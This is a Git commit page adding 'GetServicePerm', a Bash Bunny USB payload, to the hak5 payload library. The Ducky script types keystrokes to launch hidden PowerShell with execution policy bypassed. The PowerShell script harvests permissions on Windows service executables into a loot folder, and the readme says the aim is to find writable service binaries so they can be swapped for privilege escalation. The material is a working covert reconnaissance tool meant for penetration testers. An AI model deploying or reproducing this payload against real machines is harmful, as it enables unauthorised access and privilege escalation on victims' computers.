hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

New payload GetServicePerm (#290)

Browse Source
This commit is contained in:
ReshephTheGray 2017-11-20 04:16:56 +01:00 committed by Sebastian Kinne
parent f97b75983d
commit d65380bd94
3 changed files with 66 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
payloads/library/recon/GetServicePerm/GetServicePerm.ps1 Normal file
View File

@ -0,0 +1,8 @@
$drive = (gwmi win32_volume -f 'label="BashBunny"' | Select-Object -ExpandProperty DriveLetter)
ForEach ($item in (wmic service list full | Select-String -Pattern "PathName" | Select-String -Pattern "system32")) {
$file = $item.ToString($item)
icacls.exe $file.Split("=")[1].split(' ')[0] | Out-File -Append $drive\\loot\\GetServicePerm\\\$env:computername.txt
}

33
payloads/library/recon/GetServicePerm/payload.txt Normal file
View File

@ -0,0 +1,33 @@
#!/bin/bash
#
# Title: GetServicePerm
# Author: Resheph @ www.postexplo.com
# Version: 0.1
# Target: Microsoft Windows hosts supporting PowerShell
# Category: Recon
#
# Description:
# When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
# This is useful when a service is executed with elevated privileges but is modifiable by everyone.
# When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
#
# init
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LOOTDIR=/root/udisk/loot/GetServicePerm
mkdir -p $LOOTDIR
# Do Recon
LED SETUP
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING powerShell -windowstyle hidden -ExecutionPolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetServicePerm.ps1')"
Q ENTER
# Done
sync;sleep 1;sync
LED FINISH

25
payloads/library/recon/GetServicePerm/readme.md Normal file
View File

@ -0,0 +1,25 @@
# GetServicePerm
* Title: GetServicePerm
* Author: Resheph @ www.postexplo.com
* Version: 0.1
* Target: Microsoft Windows hosts supporting PowerShell
* Category: Recon
## Description
When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
This is useful when a service is executed with elevated privileges but is modifiable by everyone.
When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
## Configuration
The only thing you will need to change is the Ducky language so it matches the target.
## STATUS
LED SETUP
LED FINISH
## Discussion